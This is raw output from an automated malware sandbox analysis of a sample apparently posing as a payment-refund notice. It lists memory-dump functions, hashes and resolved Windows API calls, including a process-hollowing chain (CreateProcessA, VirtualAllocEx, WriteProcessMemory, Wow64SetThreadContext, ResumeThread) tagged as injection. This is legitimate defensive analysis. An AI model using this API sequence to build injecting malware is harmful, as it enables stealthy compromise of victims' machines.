Opcode ID: e03c267bec9239692f956593a8b0dead0f230e1cef1fbe03a307407a3c9ac6ee
Instruction ID: c248d09e999f896365ae74b82668fded26d0b9ff8439a801c7482c57d1706036
Opcode Fuzzy Hash: e03c267bec9239692f956593a8b0dead0f230e1cef1fbe03a307407a3c9ac6ee
Instruction Fuzzy Hash: 8EC1A374E00218CFEB64DFA5C954BADBBB2BF89300F1081A9D809AB355DB359E85CF51

Function 058A5328 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26395b29f244dc7740e40827f04375a23017ea83495d6bdbf876eae103f12cde
Instruction ID: 1cf5c735256f9f968c8523af436e3fbd263ee0587b356ae3523d9446bea1b11a
Opcode Fuzzy Hash: 26395b29f244dc7740e40827f04375a23017ea83495d6bdbf876eae103f12cde
Instruction Fuzzy Hash: 7DC19374E00218CFEB14DFA5C954BADBBB2BF89300F1081A9D809AB355DB359E85CF51

Function 058A7720 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 164362735aea6f2609b429bfda8643a6f19170bd3ce254bb851a323e52b76760
Instruction ID: 4231268c1e37da1a6ffff24113ecf3dd5077867dddd9dd068d2fbca3ac46b29e
Opcode Fuzzy Hash: 164362735aea6f2609b429bfda8643a6f19170bd3ce254bb851a323e52b76760
Instruction Fuzzy Hash: 5EC18E74E00218CFEB14DFA9C944BADBBB2BF89304F1081A9D809AB355DB359E85DF51

Function 058A2758 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4ca9abcf184b86bda8e74f3ea323501891d16e0ba73fe4e744432c99f9a7106
Instruction ID: bb8b04a6ba81d134c9c40e65cf2555f6d271ed0490d54b275f22ada47556dff5
Opcode Fuzzy Hash: b4ca9abcf184b86bda8e74f3ea323501891d16e0ba73fe4e744432c99f9a7106
Instruction Fuzzy Hash: 8DC19274E00218CFEB24DFA5C954BADBBB2BF89304F1081A9D809AB355DB359E85CF51

Function 058A1EA8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab7bcee8622157f5ea9af05191c95ab4fce0cd545519e085664ebd71c1cf0f7b
Instruction ID: 84c582d3577368914ca171d7ede653d64b0b6f1dc71c2a28fd93fa9ea670ada0
Opcode Fuzzy Hash: ab7bcee8622157f5ea9af05191c95ab4fce0cd545519e085664ebd71c1cf0f7b
Instruction Fuzzy Hash: B2C19374E00218CFEB64DFA5C944BADBBB2BF89304F1081A9D809AB355DB359E85CF51

Function 058A72C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0798e360a40f5da2923ae8e38a34d50c5f006cbc7269ab2c815a1c5f1ca9900
Instruction ID: 88d51cddbbd2cf9cbb5dc0745c469dfae48b105b3850e84ee2c66732bc651470
Opcode Fuzzy Hash: f0798e360a40f5da2923ae8e38a34d50c5f006cbc7269ab2c815a1c5f1ca9900
Instruction Fuzzy Hash: 20C19E74E00218CFEB14DFA9C944BADBBB2BF89304F1080A9D809AB255DB359E85CF50

Function 058A4ED0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b71e57c1af3af776be1e3e681db29e87196ad81b24278d912b067c4b9414692
Instruction ID: f753189b13ff2a884b7a3e4d6a7b5b352316be85a4635c09362a4a690e31b29a
Opcode Fuzzy Hash: 1b71e57c1af3af776be1e3e681db29e87196ad81b24278d912b067c4b9414692
Instruction Fuzzy Hash: 68C1A274E00218CFEB14DFA9C954BADBBB2BF89304F1081A9D809AB355DB359E85CF51

Function 058A6A18 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e3834fe21d9ccc1dcb9b3fe098ce27e37acec0646c4e6e6c9ee2d92473e8b1c
Instruction ID: b585a04720953c58d7b3a20162fa2ff5ee9d4ca2d6644fee7d4c05f4eab0e605
Opcode Fuzzy Hash: 7e3834fe21d9ccc1dcb9b3fe098ce27e37acec0646c4e6e6c9ee2d92473e8b1c
Instruction Fuzzy Hash: 80C19074E00218CFEB14DFA9C954BADBBB2BF89300F1081A9D809AB355DB359E85CF51

Function 058A4620 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d53caf86caac6bd3f4f6188b332a3a6c47e00a49332698739943acc88015cdcf
Instruction ID: e6db177ce03e0321be0e39b15f0938dcc27cac95c65b9658c118444271b2276a
Opcode Fuzzy Hash: d53caf86caac6bd3f4f6188b332a3a6c47e00a49332698739943acc88015cdcf
Instruction Fuzzy Hash: B1C19274E00218CFEB54DFA9C944BADBBB2BF89304F1081A9D809AB355DB359E85CF51

Function 058A1A50 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfae21bc4b6baae2b3de8ebb5c4156938169dfd29e917607d814844f73862077
Instruction ID: d8a0e9b1353bd947f5001dc53b88d7b9ea5e5ce74f62c26717321515639265a8
Opcode Fuzzy Hash: cfae21bc4b6baae2b3de8ebb5c4156938169dfd29e917607d814844f73862077
Instruction Fuzzy Hash: E3C19274E00218CFEB14DFA9C944BADBBB2BF89304F1081A9D809AB355DB359E85CF51

Function 058A4A78 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc1d1d5d77b09478e7f067200304f8ebe2c3eb6a00a71bf27a5b68c94d55af6d
Instruction ID: b585ab61947a35ef61dbdb3fdd0a5b7832b44886f0a6f32263f1cf2dd7af9bda
Opcode Fuzzy Hash: cc1d1d5d77b09478e7f067200304f8ebe2c3eb6a00a71bf27a5b68c94d55af6d
Instruction Fuzzy Hash: 72C1A274E00218CFEB14DFA9C944BADBBB2BF89300F1081A9D809AB355DB359E85CF51

Function 058A6E70 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6be49bc143f1e14090c733ce801364b5c0803b910cea265e757a175a6bdad90
Instruction ID: 983d302075c7e911a520b6a201082cab418665495fedd29860cfa40027e187d8
Opcode Fuzzy Hash: d6be49bc143f1e14090c733ce801364b5c0803b910cea265e757a175a6bdad90
Instruction Fuzzy Hash: 85C18F74E00218CFEB14DFA9C944BADBBB2BF89304F1081A9D809AB355DB359E85DF51

Function 058AB089 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a1736796466e27759299a1635e536abd9b9b5599d62f4f2ff3995637c5359f1
Instruction ID: 149454a19388fa22784d12910ec650414dc5f171b074b1739a1d7d62d77ce13d
Opcode Fuzzy Hash: 3a1736796466e27759299a1635e536abd9b9b5599d62f4f2ff3995637c5359f1
Instruction Fuzzy Hash: F441ACB4D022189FDB04DFA8D594BAEBBF1BF49304F1455A9E815B7390E7389A40CF94

Function 058AB098 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec4d48f8261de2fbf4faa1a3fdeaf5684036b26a96d52da50a0f9ce9ab104d3
Instruction ID: 11919f5ad1a4243bb28668d79e864438a71e2f0af5eb799ad00519ce4af6e53f
Opcode Fuzzy Hash: fec4d48f8261de2fbf4faa1a3fdeaf5684036b26a96d52da50a0f9ce9ab104d3
Instruction Fuzzy Hash: 3941AAB4D022189FDB04DFA8D594BAEBBF1BF49300F1455A9E815B7390E7389A40CF98

Analysis Process: SOFcFE.exePID: 7376, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	327
Total number of Limit Nodes:	17

Executed Functions

Function 0926A1CC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0926A40E

Strings

$7', xrefs: 0926A4F4

Memory Dump Source

Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd

Similarity

API ID: CreateProcess
String ID: $7'
API String ID: 963392458-2351505057
Opcode ID: f58ab52220be03ca3d1a8cdfea8a79e02632fcd005d48e3c53a9d77deb3b7f06
Instruction ID: 5ddcf4aa80941dbe7fcf12264a8829649997a6f5a4c5936657a6fa240113cb58
Opcode Fuzzy Hash: f58ab52220be03ca3d1a8cdfea8a79e02632fcd005d48e3c53a9d77deb3b7f06
Instruction Fuzzy Hash: 8AA15871D1071A8FEB24CF68C945BEEBBB2BF48310F148169E809B7290DB759985CF91

Function 0926A1D8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0926A40E

Strings

$7', xrefs: 0926A4F4

Memory Dump Source

Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd

Similarity

API ID: CreateProcess
String ID: $7'
API String ID: 963392458-2351505057
Opcode ID: b15ac276304eab4f5f93df354787057b296f1d9402fb8226c7a62571aab3ab24
Instruction ID: d421965586db28b036ab7942d119334b6a1700a77d6c505ab35dc617154849b8
Opcode Fuzzy Hash: b15ac276304eab4f5f93df354787057b296f1d9402fb8226c7a62571aab3ab24
Instruction Fuzzy Hash: 79916971D1071A8FEB24CF68C941BEEBBB2BF48310F148169E809B7290DB759985CF91

Function 04E3185B Relevance: 1.7, APIs: 1, Instructions: 169
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E31A02

Memory Dump Source

Source File: 00000010.00000002.1454698023.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4e30000_SOFcFE.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: a20f1d7a40abfddc11dc49dfa11dbfbbba80d173181a86117e07b6add6e43734
Instruction ID: 3b76994dc8491bc696f077da6373b84ce0309e6e935502395d1540f7a0dc44fc
Opcode Fuzzy Hash: a20f1d7a40abfddc11dc49dfa11dbfbbba80d173181a86117e07b6add6e43734
Instruction Fuzzy Hash: 136120B1C04348AFDF06CFA9C894ADDBFB2BF49300F15816AE858AB261D7319956CF51

Function 04E318E4 Relevance: 1.6, APIs: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E31A02

Memory Dump Source

Source File: 00000010.00000002.1454698023.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4e30000_SOFcFE.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0191df4eae619568834bdecd95dae465bb0b6a4ef84cb810452000acd03f3f73
Instruction ID: 36e61b5f99ca254ff7d9af9165bd9d9a8e258481fa7693bb4bfad13a03a4d699
Opcode Fuzzy Hash: 0191df4eae619568834bdecd95dae465bb0b6a4ef84cb810452000acd03f3f73
Instruction Fuzzy Hash: F251C0B1D103499FDB15CF99C884ADDFBB2BF48314F24822EE819AB250D775A985CF50

Function 04E318F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E31A02

Memory Dump Source

Source File: 00000010.00000002.1454698023.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4e30000_SOFcFE.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3b9185ff66b9fc648fa0e50432f4349d179171ebcd24dd5202921bdc45b8c53a
Instruction ID: f2cfb3ef752ac7f940fbdac7a681bef8ed1626397a2a887052da89569c3ae8b5
Opcode Fuzzy Hash: 3b9185ff66b9fc648fa0e50432f4349d179171ebcd24dd5202921bdc45b8c53a
Instruction Fuzzy Hash: 9541AEB1D103499FDB15CF99C884ADEFBB5BF48314F24822EE819AB210D775A945CF90

Function 026744B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 026759C9

Memory Dump Source

Source File: 00000010.00000002.1450818791.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2670000_SOFcFE.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7c2b37f13d422c1d1ce2d7766247bb7e295eebe74fdbd72840b48a2c0cfe0e86
Instruction ID: 9459b7c682bf1a62541475a4a1c868e46254c608e7103976a7107e9ed54dcb99
Opcode Fuzzy Hash: 7c2b37f13d422c1d1ce2d7766247bb7e295eebe74fdbd72840b48a2c0cfe0e86
Instruction Fuzzy Hash: 0041E271C0071DCBEB24DFA9C884B8DBBF5BF49314F60816AD409AB251DB75694ACF90

Function 04E34040 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04E34101

Memory Dump Source

Source File: 00000010.00000002.1454698023.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4e30000_SOFcFE.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 62dc70d4cff1c55986ab6a781a5ef155ab20029e9e5eb4b52c7b180a07c95afd
Instruction ID: 5010328d85cfc78a057efe46f7688c550e7e621567ae53ff52244b92c4ec481d
Opcode Fuzzy Hash: 62dc70d4cff1c55986ab6a781a5ef155ab20029e9e5eb4b52c7b180a07c95afd
Instruction Fuzzy Hash: 374145B4A002099FDB15CF99C848BAABBF5FB88314F248458D418AB361D335A841CFA1

Function 02675913 Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 026759C9

Memory Dump Source

Source File: 00000010.00000002.1450818791.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2670000_SOFcFE.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c0e4699e12fd33b6b298e126cf272d2f0b90f0953337128c5d55009e9a8d11af
Instruction ID: 7244cc5b92bb65fa10edc366a5d80aaba88b647ed2061e019846e0caf65707b4
Opcode Fuzzy Hash: c0e4699e12fd33b6b298e126cf272d2f0b90f0953337128c5d55009e9a8d11af
Instruction Fuzzy Hash: F041CEB1C00719CBEB24DFA9C8847CDBBB5BF48314F60816AD419AB251DB75694ACF90

Function 09269F49 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09269FE0

Memory Dump Source

Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 731622d40bba85c1fcf8809ae63ce810e24544b535d2e279858871c468a491c4
Instruction ID: 845d6b0b8ae9a7109e8a1810fcd374db2b6c722765cf079fabd89a533f8e2d6f
Opcode Fuzzy Hash: 731622d40bba85c1fcf8809ae63ce810e24544b535d2e279858871c468a491c4
Instruction Fuzzy Hash: 82213575D103099FDB14CFA9C881BEEBBF1FF88310F10852AE959A7250CB799981CB60

Function 09269F50 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09269FE0

Memory Dump Source

Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 42f834ffab12be6037de2f86fb86a28d0ce974ce3715bdbbae359374c682e94c
Instruction ID: a9fc1a0e28d6183300aae0db0aa66c9fbe93427d8e13fbd52228af19a3d85412
Opcode Fuzzy Hash: 42f834ffab12be6037de2f86fb86a28d0ce974ce3715bdbbae359374c682e94c
Instruction Fuzzy Hash: 57213975D103099FDB10DFAAC885BEEBBF5FF48310F108429E919A7250CB799941CBA0

Function 0926997B Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 092699FE

Memory Dump Source

Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 196378945bc10e465af43a7d2cee948299259e6a98bfdca71a399a203a185721
Instruction ID: 007076bf3f90094b417585cef68eb9d935b00a6b6c80c04c90bd9709cdf4b0fc
Opcode Fuzzy Hash: 196378945bc10e465af43a7d2cee948299259e6a98bfdca71a399a203a185721
Instruction Fuzzy Hash: 63213775D103098FDB14DFAAC4857EEBBF4EF88324F14842AD459A7240CB799985CFA1

Function 0926A038 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0926A0C0

Memory Dump Source

Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 21c73071ae1c0c4c44e7d58d9568d2d4e9057b813e53265bf5ea0c3f5246c5d4
Instruction ID: f91eccc0157c3451d31a1d7717986942e309a76b5b7c4c617277541277defc45
Opcode Fuzzy Hash: 21c73071ae1c0c4c44e7d58d9568d2d4e9057b813e53265bf5ea0c3f5246c5d4
Instruction Fuzzy Hash: CD212471C103499FDB10DFAAC881BEEBBF1FF48310F10842AE919A7250C7399941CB60

Function 0267D29C Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0267D676,?,?,?,?,?), ref: 0267D737

Memory Dump Source

Source File: 00000010.00000002.1450818791.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2670000_SOFcFE.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5e1a75666e818f54db7d6a7973a02c16667d53bd1a7009939679a6438be9141f
Instruction ID: 4bd0309ab49af38fccaa54d13b01af8be9bdaaf4e76b867221ed1109b0c8fadf
Opcode Fuzzy Hash: 5e1a75666e818f54db7d6a7973a02c16667d53bd1a7009939679a6438be9141f
Instruction Fuzzy Hash: 8F21D2B5900249AFDB10CFAAD984ADEBBF4EB48310F14841AE918A7350D375A951CFA5

Function 09269980 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 092699FE

Memory Dump Source

Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d4ada33d0b40214831f256cf8d4a6260d5cb50e2c403966a8ba832e38b079a48
Instruction ID: 8964ac6edad6e348da9523e070f9c0f9a4d20122481e3698b59d81a9ff60f17e
Opcode Fuzzy Hash: d4ada33d0b40214831f256cf8d4a6260d5cb50e2c403966a8ba832e38b079a48
Instruction Fuzzy Hash: D7214775D103098FDB10DFAAC485BEEBBF4EF48324F14842AD459A7240CB78A985CFA1

Function 0926A040 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0926A0C0

Memory Dump Source

Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ec72359161474e2b702c718fda46a97802efc4c4f2014ec1d66b9d71fbb511d3
Instruction ID: 84e4b144402b7b381528832f64ac878afb68d105c5b911d49e49e8d6d1a60bff
Opcode Fuzzy Hash: ec72359161474e2b702c718fda46a97802efc4c4f2014ec1d66b9d71fbb511d3
Instruction Fuzzy Hash: 1F212871C003499FDB10DFAAC841BEEBBF5FF48310F508429E919A7250C7799941DBA1

Function 0267D6A9 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0267D676,?,?,?,?,?), ref: 0267D737

Memory Dump Source

Source File: 00000010.00000002.1450818791.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2670000_SOFcFE.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 499d1f3206e9c5df1ccbcba951353483ad65df406e18171f68d60521bc81d0b9
Instruction ID: 06b27222a63ca42d03d272c9481cd42768275c14c0a67a774f7ebd78295dcdb7
Opcode Fuzzy Hash: 499d1f3206e9c5df1ccbcba951353483ad65df406e18171f68d60521bc81d0b9
Instruction Fuzzy Hash: FC2112B5D00249DFDB10CFA9E584ADEBBF5EB48310F14842AE968A3350C378A954CF61

Function 092698C8 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 09269932

Memory Dump Source

Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b2a345254688c2f0b8787b928cdc5be4f6d571bb14c60c6868ce000f69b16ae3
Instruction ID: e83a5a10d0b52262e07355cfadb8b9e39de3eca88155c0ece9ee9bdc13170f73
Opcode Fuzzy Hash: b2a345254688c2f0b8787b928cdc5be4f6d571bb14c60c6868ce000f69b16ae3
Instruction Fuzzy Hash: 78114971C003498FDB24DFAAC4457EEFBF4EF89324F24841AD455A7250CA769545CFA0

Function 09269E8D Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09269EFE

Memory Dump Source

Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2cddf51a7707a80066fec1c1330896b983dddbe17e07ebb229fc3342d2ea4689
Instruction ID: f0a85b97dd0ad9b74d7549b1a88a2436075146c70c5a71bc0e898d552f835860
Opcode Fuzzy Hash: 2cddf51a7707a80066fec1c1330896b983dddbe17e07ebb229fc3342d2ea4689
Instruction Fuzzy Hash: C7115675C003499FDB24DFA9C845BEEBBF5EF88320F14841AE519A7250CB769981CFA0

Function 09269E90 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09269EFE

Memory Dump Source

Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2c4e112b7cdb7dc2bb847dc397f9339bb88e9005f45614019dddcc452bcfb5f4
Instruction ID: 67ea8b5e6562d17c2651bc8784eb99b0949a1fea433d36417c53b99fbc2d8e9f
Opcode Fuzzy Hash: 2c4e112b7cdb7dc2bb847dc397f9339bb88e9005f45614019dddcc452bcfb5f4
Instruction Fuzzy Hash: 08113775C003499FDB20DFAAC845BDEBBF5EF88324F148419E515A7250CB769940CFA1

Function 092698D0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 09269932

Memory Dump Source

